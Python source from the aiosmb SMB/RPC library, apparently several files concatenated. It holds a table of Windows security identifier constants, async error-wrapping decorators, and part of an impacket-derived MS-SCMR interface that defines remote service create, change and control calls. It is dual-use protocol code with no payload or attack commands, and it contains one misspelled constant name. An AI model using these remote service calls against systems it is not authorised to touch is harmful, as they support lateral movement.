	'SCHANNEL_AUTHENTICATION' : SID.from_string('S-1-5-64-14', True),
	'DIGEST_AUTHENTICATION' : SID.from_string('S-1-5-64-21', True),
	'THIS_ORGANIZATION_CERTIFICATE' : SID.from_string('S-1-5-65-1', True),
	'NT_SERVICE' : SID.from_string('S-1-5-80', True),
	'USER_MODE_DRIVERS' : SID.from_string('S-1-5-84-0-0-0-0-0', True),
	'LOCAL_ACCOUNT' : SID.from_string('S-1-5-113', True),
	'LOCAL_ACCOUNT_AND_MEMBER_OF_ADMINISTRATORS_GROUP' : SID.from_string('S-1-5-114', True),
	'OTHER_ORGANIZATION' : SID.from_string('S-1-5-1000', True),
	'ALL_APP_PACKAGES' : SID.from_string('S-1-15-2-1', True),
	'ML_UNTRUSTED' : SID.from_string('S-1-16-0', True),
	'ML_LOW' : SID.from_string('S-1-16-4096', True),
	'ML_MEDIUM' : SID.from_string('S-1-16-8192', True),
	'ML_MEDIUM_PLUS' : SID.from_string('S-1-16-8448', True),
	'ML_HIGH' : SID.from_string('S-1-16-12288', True),
	'ML_SYSTEM' : SID.from_string('S-1-16-16384', True),
	'ML_PROTECTED_PROCESS' : SID.from_string('S-1-16-20480', True),
	'ML_SECURE_PROCESS' : SID.from_string('S-1-16-28672', True),
	'AUTHENTICATION_AUTHORITY_ASSERTED_IDENTITY' : SID.from_string('S-1-18-1', True),
	'SERVICE_ASSERTED_IDENTITY' : SID.from_string('S-1-18-2', True),
	'FRESH_PUBLIC_KEY_IDENTITY' : SID.from_string('S-1-18-3', True),
	'KEY_TRUST_IDENTITY' : SID.from_string('S-1-18-4', True),
	'KEY_PROPERTY_MFA' : SID.from_string('S-1-18-5', True),
	'KEY_PROPERTY_ATTESTATION' : SID.from_string('S-1-18-6', True),
}






from aiosmb import logger
from aiosmb.commons.utils.extb import pprint_exc
# the decorators below are used extensively to support the "result, exception" return types

async def ef_gen(coro):
	try:
		async for x in coro:
			if x[-1] is not None:  #the last arg MUST ALWAYS be an exception or none!
				raise x[-1]
				
			yield x
	except Exception as error:
		pprint_exc(error)

def red_gen_deepdebug(funct):
	async def wrapper(*args, **kwargs):
		try:
			print('GEN_CALL:%s PARAMS: %s' % (funct.__name__, repr(args)))
			async for x in funct(*args, **kwargs):
				print('GEN_RET :%s VALUE: %s' % (funct.__name__, repr(x)))
				if x is None:
					print('GEN_RET ERROR @%s! ret value is a simple None. This is not according to coding guidelines' % funct.__name__)
				if len(x) < 2:
					print('GEN_RET ERROR @%s! only one parameter returned. This is not according to coding guidelines' % funct.__name__)
				if x[-1] is not None and isinstance(x[-1], Exception):
					print('GEN_RET ERROR @%s! the last return parameter is not None and also not an exception!' % funct.__name__)
				
				if x[-1] is not None:  #the last arg MUST ALWAYS be an exception or none!
					yield None, x[-1]
					break
				yield x
		except Exception as error:
			yield None, error
	return wrapper

def red_gen_original(funct):
	async def wrapper(*args, **kwargs):
		try:
			async for x in funct(*args, **kwargs):
				if x[-1] is not None:  #the last arg MUST ALWAYS be an exception or none!
					yield None, x[-1]
					break
				yield x
		except Exception as error:
			yield None, error
	return wrapper

def red_deepdebug(funct):
	async def wrapper(*args, **kwargs):
		try:
			print('CALL:%s PARAMS: %s' % (funct.__name__, repr(args)))
			x = await funct(*args, **kwargs)
			print('RET :%s VALUE: %s' % (funct.__name__, repr(x)))
			if x is None:
				print('GEN_RET ERROR @%s.%s! ret value is a simple None. This is not according to coding guidelines' % (str(type(args[0])), funct.__name__))
			if len(x) < 2:
				print('GEN_RET ERROR @%s.%s! only one parameter returned. This is not according to coding guidelines' % (str(type(args[0])), funct.__name__))
			if x[-1] is not None and isinstance(x[-1], Exception):
				print('GEN_RET ERROR @%s.%s! the last return parameter is not None and also not an exception!' % (str(type(args[0])), funct.__name__))
			
			if x[-1] is None:
				return x
			return x

		except Exception as error:
			print('EXC:%s REASON: %s' % (funct.__name__, repr(error)))
			return None, error
	return wrapper	

def red_original(funct):
	async def wrapper(*args, **kwargs):
		try:			
			x = await funct(*args, **kwargs)
			#if x[-1] is not None:
			#	raise x[-1]
			return x
		except Exception as error:
			return None, error
	return wrapper

#
# toggle to get more logging info
#
red = red_original
red_gen = red_gen_original
#red = red_deepdebug
#red_gen = red_gen_deepdebug

async def rr(coro):
	try:
		x = await coro
		error = x[-1] #the last arg MUST ALWAYS be an exception or none!
		if error is not None:
			raise error
		return x
	except Exception as e:
		raise e
	


async def rr_gen(coro):
	try:
		async for x in coro:
			if x[-1] is not None:  #the last arg MUST ALWAYS be an exception or none!
				raise x[-1]
			yield x
	except Exception as e:
		raise e



# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author: Alberto Solino (@agsolino)
#
# Description:
#   [MS-SCMR] Interface implementation
#
#   Best way to learn how to use these calls is to grab the protocol standard
#   so you understand what the call does, and then read the test case located
#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
#
#   Some calls have helper functions, which makes it even easier to use.
#   They are located at the end of this file. 
#   Helper functions start with "h"<name of the call>.
#   There are test cases for them too. 
#


from aiosmb.dcerpc.v5.dtypes import NULL, DWORD, LPWSTR, ULONG, BOOL, LPBYTE, ULONGLONG, PGUID, USHORT, LPDWORD, WSTR, \
	GUID, PBOOL, WIDESTR
from aiosmb.dcerpc.v5.ndr import NDRCALL, NDR, NDRSTRUCT, NDRPOINTER, NDRPOINTERNULL, NDRUniConformantArray, NDRUNION
from aiosmb.dcerpc.v5.rpcrt import DCERPCException
from aiosmb.dcerpc.v5.uuid import uuidtup_to_bin
from aiosmb.dcerpc.v5 import system_errors
from aiosmb.commons.utils.decorators import red, rr
from aiosmb.commons.exceptions import SMBException

MSRPC_UUID_SCMR = uuidtup_to_bin(('367ABB81-9844-35F1-AD32-98F038001003', '2.0'))

class DCERPCSessionError(DCERPCException):
	def __init__(self, error_string=None, error_code=None, packet=None):
		DCERPCException.__init__(self, error_string, error_code, packet)

	def __str__( self ):
		return 'SCMR SessionError: unknown error code: 0x%x' % self.error_code

################################################################################
# CONSTANTS
################################################################################

# Access codes
SERVICE_ALL_ACCESS            = 0X000F01FF
SERVICE_CHANGE_CONFIG         = 0X00000002
SERVICE_ENUMERATE_DEPENDENTS  = 0X00000008
SERVICE_INTERROGATE           = 0X00000080
SERVICE_PAUSE_CONTINUE        = 0X00000040
SERVICE_QUERY_CONFIG          = 0X00000001
SERVICE_QUERY_STATUS          = 0X00000004
SERVICE_START                 = 0X00000010
SERVICE_STOP                  = 0X00000020
SERVICE_USER_DEFINED_CTRL     = 0X00000100
SERVICE_SET_STATUS            = 0X00008000

# Specific Access for SCM
SC_MANAGER_LOCK               = 0x00000008
SC_MANAGER_CREATE_SERVICE     = 0x00000002
SC_MANAGER_ENUMERATE_SERVICE  = 0x00000004
SC_MANAGER_CONNECT            = 0x00000001
SC_MANAGER_QUERY_LOCK_STATUS  = 0x00000010
SC_MANAGER_MODIFY_BOOT_CONFIG = 0x00000020

# Service Types
SERVICE_KERNEL_DRIVER         = 0x00000001
SERVICE_FILE_SYSTEM_DRIVER    = 0x00000002
SERVICE_WIN32_OWN_PROCESS     = 0x00000010
SERVICE_WIN32_SHARE_PROCESS   = 0x00000020
SERVICE_INTERACTIVE_PROCESS   = 0x00000100
SERVICE_NO_CHANGE             = 0xffffffff

# Start Types
SERVICE_BOOT_START            = 0x00000000
SERVICE_SYSTEM_START          = 0x00000001
SERVICE_AUTO_START            = 0x00000002
SERVICE_DEMAND_START          = 0x00000003
SERVICE_DISABLED              = 0x00000004
SERVICE_NO_CHANGE             = 0xffffffff

# Error Control 
SERVICE_ERROR_IGNORE          = 0x00000000
SERVICE_ERROR_NORMAL          = 0x00000001
SERVICE_ERROR_SEVERE          = 0x00000002
SERVICE_ERROR_CRITICAL        = 0x00000003
SERVICE_NO_CHANGE             = 0xffffffff

# Service Control Codes
SERVICE_CONTROL_CONTINUE      = 0x00000003
SERVICE_CONTROL_INTERROGATE   = 0x00000004
SERVICE_CONTROL_PARAMCHANGE   = 0x00000006
SERVICE_CONTROL_PAUSE         = 0x00000002
SERVICE_CONTROL_STOP          = 0x00000001
SERVICE_CONTROL_NETBINDADD    = 0x00000007
SERVICE_CONTROL_NETBINDREMOVE = 0x00000008
SERVICE_CONTROL_NETBINDENABLE = 0x00000009
SERVICE_CONTROL_NETBINDDISABLE= 0x0000000A

# Service State
SERVICE_ACTIVE                = 0x00000001
SERVICE_INACTIVE              = 0x00000002
SERVICE_STATE_ALL             = 0x00000003

# Current State
SERVICE_CONTINUE_PENDING      = 0x00000005
SERVICE_PAUSE_PENDING         = 0x00000006
SERVICE_PAUSED                = 0x00000007
SERVICE_RUNNING               = 0x00000004
SERVICE_START_PENDING         = 0x00000002
SERVICE_STOP_PENDING          = 0x00000003
SERVICE_STOPPED               = 0x00000001

# Controls Accepted
SERVICE_ACCEPT_PARAMCHANGE           = 0x00000008
SERVICE_ACCEPT_PAUSE_CONTINUE        = 0x00000002
SERVICE_ACCEPT_SHUTDOWN              = 0x00000004
SERVICE_ACCEPT_STOP                  = 0x00000001
SERVICE_ACCEPT_HARDWAREPROFILECHANGE = 0x00000020
SERVICE_ACCEPT_POWEREVENT            = 0x00000040
SERVICE_ACCEPT_SESSIONCHANGE         = 0x00000080
SERVICE_ACCEPT_PRESHUTDOWN           = 0x00000100
SERVICE_ACCEPT_TIMECHANGE            = 0x00000200
ERVICE_ACCEPT_TRIGGEREVENT           = 0x00000400

# Security Information
DACL_SECURITY_INFORMATION     = 0x4
GROUP_SECURITY_INFORMATION    = 0x2
OWNER_SECURITY_INFORMATION    = 0x1
SACL_SECURITY_INFORMATION     = 0x8

# Service Config2 Info Levels
SERVICE_CONFIG_DESCRIPTION              = 0x00000001
SERVICE_CONFIG_FAILURE_ACTIONS          = 0x00000002
SERVICE_CONFIG_DELAYED_AUTO_START_INFO  = 0x00000003
SERVICE_CONFIG_FAILURE_ACTIONS_FLAG     = 0x00000004
SERVICE_CONFIG_SERVICE_SID_INFO         = 0x00000005
SERVICE_CONFIG_REQUIRED_PRIVILEGES_INFO = 0x00000006
SERVICE_CONFIG_PRESHUTDOWN_INFO         = 0x00000007
SERVICE_CONFIG_PREFERRED_NODE           = 0x00000009
SERVICE_CONFIG_RUNLEVEL_INFO            = 0x0000000A

# SC_ACTIONS Types
SC_ACTION_NONE        = 0
SC_ACTION_RESTART     = 1
SC_ACTION_REBOOT      = 2
SC_ACTION_RUN_COMMAND = 3

# SERVICE_SID_INFO types
SERVICE_SID_TYPE_NONE         = 0x00000000
SERVICE_SID_TYPE_RESTRICTED   = 0x00000003
SERVICE_SID_TYPE_UNRESTRICTED = 0x00000001

# SC_STATUS_TYPE types
SC_STATUS_PROCESS_INFO = 0

# Notify Mask
SERVICE_NOTIFY_CREATED          = 0x00000080
SERVICE_NOTIFY_CONTINUE_PENDING = 0x00000010
SERVICE_NOTIFY_DELETE_PENDING   = 0x00000200
SERVICE_NOTIFY_DELETED          = 0x00000100
SERVICE_NOTIFY_PAUSE_PENDING    = 0x00000020
SERVICE_NOTIFY_PAUSED           = 0x00000040
SERVICE_NOTIFY_RUNNING          = 0x00000008
SERVICE_NOTIFY_START_PENDING    = 0x00000002
SERVICE_NOTIFY_STOP_PENDING     = 0x00000004
SERVICE_NOTIFY_STOPPED          = 0x00000001

# SERVICE_CONTROL_STATUS_REASON_IN_PARAMSW Reasons
SERVICE_STOP_CUSTOM    =  0x20000000
SERVICE_STOP_PLANNED   =  0x40000000
SERVICE_STOP_UNPLANNED =  0x10000000

# SERVICE_TRIGGER triggers
SERVICE_TRIGGER_TYPE_DEVICE_INTERFACE_ARRIVAL  = 0x00000001
SERVICE_TRIGGER_TYPE_IP_ADDRESS_AVAILABILITY   = 0x00000002
SERVICE_TRIGGER_TYPE_DOMAIN_JOIN               = 0x00000003
SERVICE_TRIGGER_TYPE_FIREWALL_PORT_EVENT       = 0x00000004
SERVICE_TRIGGER_TYPE_GROUP_POLICY              = 0x00000005
SERVICE_TRIGGER_TYPE_CUSTOM                    = 0x00000020

# SERVICE_TRIGGER actions
SERVICE_TRIGGER_ACTION_SERVICE_START = 0x00000001
SERVICE_TRIGGER_ACTION_SERVICE_STOP  = 0x00000002

# SERVICE_TRIGGER subTypes
DOMAIN_JOIN_GUID                                = '1ce20aba-9851-4421-9430-1ddeb766e809' 
DOMAIN_LEAVE_GUID                               = 'ddaf516e-58c2-4866-9574-c3b615d42ea1'
FIREWALL_PORT_OPEN_GUID                         = 'b7569e07-8421-4ee0-ad10-86915afdad09'
FIREWALL_PORT_CLOSE_GUID                        = 'a144ed38-8e12-4de4-9d96-e64740b1a524'
MACHINE_POLICY_PRESENT_GUID                     = '659FCAE6-5BDB-4DA9-B1FF-CA2A178D46E0'
NETWORK_MANAGER_FIRST_IP_ADDRESS_ARRIVAL_GUID   = '4f27f2de-14e2-430b-a549-7cd48cbc8245'
NETWORK_MANAGER_LAST_IP_ADDRESS_REMOVAL_GUID    = 'cc4ba62a-162e-4648-847a-b6bdf993e335'
USER_POLICY_PRESENT_GUID                        = '54FB46C8-F089-464C-B1FD-59D1B62C3B50'

# SERVICE_TRIGGER_SPECIFIC_DATA_ITEM dataTypes
SERVICE_TRIGGER_DATA_TYPE_BINARY = 0x00000001
SERVICE_TRIGGER_DATA_TYPE_STRING = 0x00000002

################################################################################
# STRUCTURES
################################################################################

class SC_RPC_HANDLE(NDRSTRUCT):
	structure =  (
		('Data','20s=""'),
	)
	def getAlignment(self):
		return 1

SC_NOTIFY_RPC_HANDLE = SC_RPC_HANDLE

class SERVICE_STATUS(NDRSTRUCT):
	structure =  (
		('dwServiceType',DWORD),
		('dwCurrentState',DWORD),
		('dwControlsAccepted',DWORD),
		('dwWin32ExitCode',DWORD),
		('dwServiceSpecificExitCode',DWORD),
		('dwCheckPoint',DWORD),
		('dwWaitHint',DWORD),
	)

class QUERY_SERVICE_CONFIGW(NDRSTRUCT):
	structure = (
		('dwServiceType',DWORD),
		('dwStartType',DWORD),
		('dwErrorControl',DWORD),
		('lpBinaryPathName', LPWSTR),
		('lpLoadOrderGroup',LPWSTR),
		('dwTagId',DWORD),
		('lpDependencies',LPWSTR),
		('lpServiceStartName',LPWSTR),
		('lpDisplayName',LPWSTR),
	)

class SC_RPC_LOCK(NDRSTRUCT):
	structure =  (
		('Data','20s=""'),
	)
	def getAlignment(self):
		return 1

class LPSERVICE_STATUS(NDRPOINTER):
	referent = (
		('Data',SERVICE_STATUS),
	)

SECURITY_INFORMATION = ULONG

BOUNDED_DWORD_256K = DWORD

class LPBOUNDED_DWORD_256K(NDRPOINTER):
	referent = (
		('Data', BOUNDED_DWORD_256K),
	)

SVCCTL_HANDLEW = LPWSTR

class ENUM_SERVICE_STATUSW(NDRSTRUCT):
	structure = (
		('lpServiceName',LPWSTR),
		('lpDisplayName',LPWSTR),
		('ServiceStatus',SERVICE_STATUS),
	)

class LPQUERY_SERVICE_CONFIGW(NDRPOINTER):
	referent = (
		('Data', QUERY_SERVICE_CONFIGW),
	)

BOUNDED_DWORD_8K = DWORD
BOUNDED_DWORD_4K = DWORD

class STRING_PTRSW(NDRSTRUCT):
	structure = (
		('Data',NDRUniConformantArray),
	)
	def __init__(self, data = None, isNDR64 = False):
		NDR.__init__(self,None,isNDR64)
		self.fields['Data'].item = LPWSTR
		if data is not None:
			self.fromString(data)

class UNIQUE_STRING_PTRSW(NDRPOINTER):
	referent = (
		('Data', STRING_PTRSW),
	)

class QUERY_SERVICE_LOCK_STATUSW(NDRSTRUCT):
	structure = (
		('fIsLocked',DWORD),
		('lpLockOwner',LPWSTR),
		('dwLockDuration',DWORD),
	)

class SERVICE_DESCRIPTION_WOW64(NDRSTRUCT):
	structure = (
		('dwDescriptionOffset', DWORD),
	)

class SERVICE_DESCRIPTIONW(NDRSTRUCT):
	structure = (
		('lpDescription', LPWSTR),
	)

class LPSERVICE_DESCRIPTIONW(NDRPOINTER):
	referent = (
		('Data', SERVICE_DESCRIPTIONW),
	)

class SERVICE_FAILURE_ACTIONS_WOW64(NDRSTRUCT):
	structure = (
		('dwResetPeriod', DWORD),
		('dwRebootMsgOffset', DWORD),
		('dwCommandOffset', DWORD),
		('cActions', DWORD),
		('dwsaActionsOffset', DWORD),
	)

class SC_ACTION(NDRSTRUCT):
	structure = (
		('Type', DWORD), 
		('Delay', DWORD) , 
	)

class SC_ACTIONS(NDRSTRUCT):
	structure = (
	   ('Data', NDRUniConformantArray),
	)
	def __init__(self, data = None, isNDR64 = False):
		NDR.__init__(self,None,isNDR64)
		self.fields['Data'].item = SC_ACTION
		if data is not None:
			self.fromString(data)

class SERVICE_FAILURE_ACTIONSW(NDRSTRUCT):
	structure = (
		('dwResetPeriod', DWORD), 
		('lpRebootMsg', LPWSTR) , 
		('lpCommand', LPWSTR) , 
		('cActions', DWORD) , 
		('lpsaActions', SC_ACTIONS) , 
	)

class LPSERVICE_FAILURE_ACTIONSW(NDRPOINTER):
	referent = (
		('Data', SERVICE_FAILURE_ACTIONSW),
	)

class SERVICE_FAILURE_ACTIONS_FLAG(NDRSTRUCT):
	structure = (
		('fFailureActionsOnNonCrashFailures', BOOL),
	)

class LPSERVICE_FAILURE_ACTIONS_FLAG(NDRPOINTER):
	referent = (
		('Data', SERVICE_FAILURE_ACTIONS_FLAG),
	)

class SERVICE_DELAYED_AUTO_START_INFO(NDRSTRUCT):
	structure = (
		('fDelayedAutostart', BOOL),
	)

class LPSERVICE_DELAYED_AUTO_START_INFO(NDRPOINTER):
	referent = (
		('Data', SERVICE_DELAYED_AUTO_START_INFO),
	)

class SERVICE_SID_INFO(NDRSTRUCT):
	structure = (
		('dwServiceSidType', DWORD),
	)

class LPSERVICE_SID_INFO(NDRPOINTER):
	referent = (
		('Data', SERVICE_SID_INFO),
	)


class SERVICE_RPC_REQUIRED_PRIVILEGES_INFO(NDRSTRUCT):
	structure = (
		('cbRequiredPrivileges',DWORD),
		('pRequiredPrivileges',LPBYTE),
	)
	def getData(self, soFar = 0):
		self['cbRequiredPrivileges'] = len(self['pRequiredPrivileges'])
		return NDR.getData(self, soFar = 0)


class LPSERVICE_RPC_REQUIRED_PRIVILEGES_INFO(NDRPOINTER):
	referent = (
		('Data', SERVICE_RPC_REQUIRED_PRIVILEGES_INFO),
	)

class SERVICE_REQUIRED_PRIVILEGES_INFO_WOW64(NDRSTRUCT):
	structure = (
		('dwRequiredPrivilegesOffset', DWORD),
	)

class SERVICE_PRESHUTDOWN_INFO(NDRSTRUCT):
	structure = (
		('dwPreshutdownTimeout', DWORD),
	)

class LPSERVICE_PRESHUTDOWN_INFO(NDRPOINTER):
	referent = (
		('Data', SERVICE_PRESHUTDOWN_INFO),
	)

class SERVICE_STATUS_PROCESS(NDRSTRUCT):
	structure = (
		('dwServiceType', DWORD),
		('dwCurrentState', DWORD),
		('dwControlsAccepted', DWORD),
		('dwWin32ExitCode', DWORD),
		('dwServiceSpecificExitCode', DWORD),
		('dwCheckPoint', DWORD),
		('dwWaitHint', DWORD),
		('dwProcessId', DWORD),
		('dwServiceFlags', DWORD),
	)

class UCHAR_16(NDRSTRUCT):
	structure = (
		('Data', '16s=""'),
	)
	def getAlignment(self):
		return 1

class SERVICE_NOTIFY_STATUS_CHANGE_PARAMS_1(NDRSTRUCT):
	structure = (
		('ullThreadId',ULONGLONG),
		('dwNotifyMask',DWORD),
		('CallbackAddressArray',UCHAR_16),
		('CallbackParamAddressArray',UCHAR_16),
		('ServiceStatus', SERVICE_STATUS_PROCESS),
		('dwNotificationStatus',DWORD),
		('dwSequence',DWORD),
	)

class SERVICE_NOTIFY_STATUS_CHANGE_PARAMS_2(NDRSTRUCT):
	structure = (
		('ullThreadId',ULONGLONG),
		('dwNotifyMask',DWORD),
		('CallbackAddressArray',UCHAR_16),
		('CallbackParamAddressArray',UCHAR_16),
		('ServiceStatus',SERVICE_STATUS_PROCESS),
		('dwNotificationStatus',DWORD),
		('dwSequence',DWORD),
		('dwNotificationTriggered',DWORD),
		('pszServiceNames',LPWSTR),
	)

class PSERVICE_NOTIFY_STATUS_CHANGE_PARAMS_1(NDRPOINTER):
	referent = (
		('Data', SERVICE_NOTIFY_STATUS_CHANGE_PARAMS_1),
	)

class PSERVICE_NOTIFY_STATUS_CHANGE_PARAMS_2(NDRPOINTER):
	referent = (
		('Data', SERVICE_NOTIFY_STATUS_CHANGE_PARAMS_2),
	)

class SC_RPC_NOTIFY_PARAMS(NDRUNION):
	union = {
		1: ('pStatusChangeParam1', PSERVICE_NOTIFY_STATUS_CHANGE_PARAMS_1),
		2: ('pStatusChangeParams', PSERVICE_NOTIFY_STATUS_CHANGE_PARAMS_2),
	}

class SC_RPC_NOTIFY_PARAMS_ARRAY(NDRUniConformantArray):
	 item = SC_RPC_NOTIFY_PARAMS

class PSC_RPC_NOTIFY_PARAMS_LIST(NDRSTRUCT):
	structure = (
		('cElements',BOUNDED_DWORD_4K),
		('NotifyParamsArray', SC_RPC_NOTIFY_PARAMS_ARRAY),
	)

class SERVICE_CONTROL_STATUS_REASON_IN_PARAMSW(NDRSTRUCT):
	structure = (
		('dwReason', DWORD),
		('pszComment', LPWSTR),
	)

class SERVICE_TRIGGER_SPECIFIC_DATA_ITEM(NDRSTRUCT):
	structure = (
		('dwDataType',DWORD ),
		('cbData',DWORD),
		('pData', LPBYTE),
	)
	def getData(self, soFar = 0):
		if self['pData'] != 0:
			self['cbData'] = len(self['pData'])
		return NDR.getData(self, soFar)

class SERVICE_TRIGGER_SPECIFIC_DATA_ITEM_ARRAY(NDRUniConformantArray):
	item = SERVICE_TRIGGER_SPECIFIC_DATA_ITEM

class PSERVICE_TRIGGER_SPECIFIC_DATA_ITEM(NDRPOINTER):
	referent = (
		('Data', SERVICE_TRIGGER_SPECIFIC_DATA_ITEM_ARRAY),
	)

class SERVICE_TRIGGER(NDRSTRUCT):
	structure = (
		('dwTriggerType', DWORD),
		('dwAction', DWORD),
		('pTriggerSubtype', PGUID),
		('cDataItems', DWORD),
		('pDataItems', PSERVICE_TRIGGER_SPECIFIC_DATA_ITEM),
	)
	def getData(self, soFar = 0):
		if self['pDataItems'] != 0:
			self['cDataItems'] = len(self['pDataItems'])
		return NDR.getData(self, soFar)

class SERVICE_TRIGGER_ARRAY(NDRUniConformantArray):
	item = SERVICE_TRIGGER

class PSERVICE_TRIGGER(NDRPOINTER):
	referent = (
		('Data', SERVICE_TRIGGER_ARRAY),
	)

class SERVICE_CONTROL_STATUS_REASON_OUT_PARAMS(NDRSTRUCT):
	structure = (
	   ('ServiceStatus', SERVICE_STATUS_PROCESS),
	)

class SERVICE_TRIGGER_INFO(NDRSTRUCT):
	structure = (
		('cTriggers', DWORD),
		('pTriggers', PSERVICE_TRIGGER),
		('pReserved', NDRPOINTERNULL ),
	)
	def getData(self, soFar = 0):
		if self['pTriggers'] != 0:
			self['cTriggers'] = len(self['pTriggers'])
		return NDR.getData(self, soFar)
	
class PSERVICE_TRIGGER_INFO(NDRPOINTER):
	referent = (
		('Data', SERVICE_TRIGGER_INFO),
	)

class SERVICE_PREFERRED_NODE_INFO(NDRSTRUCT):
	structure = (
		('usPreferredNode', USHORT),
		('fDelete', BOOL),
	)

class LPSERVICE_PREFERRED_NODE_INFO(NDRPOINTER):
	referent = (
		('Data', SERVICE_PREFERRED_NODE_INFO),
	)

class SERVICE_RUNLEVEL_INFO(NDRSTRUCT):
	structure = (
		('eLowestRunLevel', DWORD),
	)

class PSERVICE_RUNLEVEL_INFO(NDRPOINTER):
	referent = (
		('Data', SERVICE_RUNLEVEL_INFO),
	)

class SERVICE_MANAGEDACCOUNT_INFO(NDRSTRUCT):
	structure = (
		('fIsManagedAccount', DWORD),
	)

class PSERVICE_MANAGEDACCOUNT_INFO(NDRPOINTER):
	referent = (
		('Data', SERVICE_MANAGEDACCOUNT_INFO),
	)

class SC_RPC_CONFIG_INFOW_UNION(NDRUNION):
	commonHdr = (
		('tag', ULONG),
	)

	union = {
		1: ('psd', LPSERVICE_DESCRIPTIONW),
		2: ('psfa',LPSERVICE_FAILURE_ACTIONSW ),
		3: ('psda',LPSERVICE_DELAYED_AUTO_START_INFO),
		4: ('psfaf',LPSERVICE_FAILURE_ACTIONS_FLAG),
		5: ('pssid',LPSERVICE_SID_INFO),
		6: ('psrp',LPSERVICE_RPC_REQUIRED_PRIVILEGES_INFO),
		7: ('psps',LPSERVICE_PRESHUTDOWN_INFO),
		8: ('psti',PSERVICE_TRIGGER_INFO),
		9: ('pspn',LPSERVICE_PREFERRED_NODE_INFO),
		10: ('psri',PSERVICE_RUNLEVEL_INFO),
		11: ('psma',PSERVICE_MANAGEDACCOUNT_INFO),
	}

class SC_RPC_CONFIG_INFOW(NDRSTRUCT):
	structure = (
		('dwInfoLevel', DWORD),
		('Union', SC_RPC_CONFIG_INFOW_UNION),
	)

################################################################################
# RPC CALLS
################################################################################

class RCloseServiceHandle(NDRCALL):
	opnum = 0
	structure = (
		('hSCObject',SC_RPC_HANDLE),
	)

class RCloseServiceHandleResponse(NDRCALL):
	structure = (
		('hSCObject',SC_RPC_HANDLE),
		('ErrorCode', DWORD),
	)

class RControlService(NDRCALL):
	opnum = 1
	structure = (
		('hService',SC_RPC_HANDLE),
		('dwControl',DWORD),
	)

class RControlServiceResponse(NDRCALL):
	structure = (
		('lpServiceStatus',SERVICE_STATUS),
		('ErrorCode', DWORD),
	)

class RDeleteService(NDRCALL):
	opnum = 2
	structure = (
		('hService',SC_RPC_HANDLE),
	)

class RDeleteServiceResponse(NDRCALL):
	structure = (
		('ErrorCode', DWORD),
	)

class RLockServiceDatabase(NDRCALL):
	opnum = 3
	structure = (
		('hSCManager',SC_RPC_HANDLE),
	)

class RLockServiceDatabaseResponse(NDRCALL):
	structure = (
		('lpLock',SC_RPC_LOCK),
		('ErrorCode', DWORD),
	)

class RQueryServiceObjectSecurity(NDRCALL):
	opnum = 4
	structure = (
		('hService',SC_RPC_HANDLE),
		('dwSecurityInformation',SECURITY_INFORMATION),
		('cbBufSize',DWORD),
	)

class RQueryServiceObjectSecurityResponse(NDRCALL):
	structure = (
		('lpSecurityDescriptor',LPBYTE),
		('pcbBytesNeeded',BOUNDED_DWORD_256K),
		('ErrorCode', DWORD),
	)

class RSetServiceObjectSecurity(NDRCALL):
	opnum = 5
	structure = (
		('hService',SC_RPC_HANDLE),
		('dwSecurityInformation',SECURITY_INFORMATION),
		('lpSecurityDescriptor',LPBYTE),
		('cbBufSize',DWORD),
	)

class RSetServiceObjectSecurityResponse(NDRCALL):
	structure = (
		('ErrorCode', DWORD),
	)

class RQueryServiceStatus(NDRCALL):
	opnum = 6
	structure = (
		('hService',SC_RPC_HANDLE),
	)

class RQueryServiceStatusResponse(NDRCALL):
	structure = (
		('lpServiceStatus',SERVICE_STATUS),
		('ErrorCode', DWORD),
	)

class RSetServiceStatus(NDRCALL):
	opnum = 7
	structure = (
		('hServiceStatus',SC_RPC_HANDLE),
		('lpServiceStatus',SERVICE_STATUS),
	)

class RSetServiceStatusResponse(NDRCALL):
	structure = (
		('ErrorCode', DWORD),
	)

class RUnlockServiceDatabase(NDRCALL):
	opnum = 8
	structure = (
		('Lock',SC_RPC_LOCK),
	)

class RUnlockServiceDatabaseResponse(NDRCALL):
	structure = (
		('Lock',SC_RPC_LOCK),
		('ErrorCode', DWORD),
	)

class RNotifyBootConfigStatus(NDRCALL):
	opnum = 9
	structure = (
		('lpMachineName',SVCCTL_HANDLEW),
		('BootAcceptable',DWORD),
	)

class RNotifyBootConfigStatusResponse(NDRCALL):
	structure = (
		('ErrorCode', DWORD),
	)

class RChangeServiceConfigW(NDRCALL):
	opnum = 11
	structure = (
		('hService',SC_RPC_HANDLE),
		('dwServiceType',DWORD),
		('dwStartType',DWORD),
		('dwErrorControl',DWORD),
		('lpBinaryPathName',LPWSTR),
		('lpLoadOrderGroup',LPWSTR),
		('lpdwTagId',LPDWORD),
		('lpDependencies',LPBYTE),
		('dwDependSize',DWORD),
		('lpServiceStartName',LPWSTR),
		('lpPassword',LPBYTE),
		('dwPwSize',DWORD),
		('lpDisplayName',LPWSTR),
	)

class RChangeServiceConfigWResponse(NDRCALL):
	structure = (
		('lpdwTagId',LPDWORD),
		('ErrorCode', DWORD),
	)

class RCreateServiceW(NDRCALL):
	opnum = 12
	structure = (
		('hSCManager',SC_RPC_HANDLE),
		('lpServiceName',WSTR),
		('lpDisplayName',LPWSTR),
		('dwDesiredAccess',DWORD),
		('dwServiceType',DWORD),
		('dwStartType',DWORD),
		('dwErrorControl',DWORD),
		('lpBinaryPathName',WSTR),
		('lpLoadOrderGroup',LPWSTR),
		('lpdwTagId',LPDWORD),
		('lpDependencies',LPBYTE),
		('dwDependSize',DWORD),
		('lpServiceStartName',LPWSTR),
		('lpPassword',LPBYTE),
		('dwPwSize',DWORD),
	)

class RCreateServiceWResponse(NDRCALL):
	structure = (
		('lpdwTagId',LPWSTR),
		('lpServiceHandle',SC_RPC_HANDLE),
		('ErrorCode', DWORD),
	)

class REnumDependentServicesW(NDRCALL):
	opnum = 13
	structure = (
		('hService',SC_RPC_HANDLE),
		('dwServiceState',DWORD),
		('cbBufSize',DWORD),
	)

class REnumDependentServicesWResponse(NDRCALL):
	structure = (
		('lpServices',NDRUniConformantArray),
		('pcbBytesNeeded',BOUNDED_DWORD_256K),
		('lpServicesReturned',BOUNDED_DWORD_256K),
		('ErrorCode', DWORD),
	)

class REnumServicesStatusW(NDRCALL):
	opnum = 14
	structure = (
		('hSCManager',SC_RPC_HANDLE),
		('dwServiceType',DWORD),
		('dwServiceState',DWORD),
		('cbBufSize',DWORD),
		('lpResumeIndex',LPBOUNDED_DWORD_256K),
	)

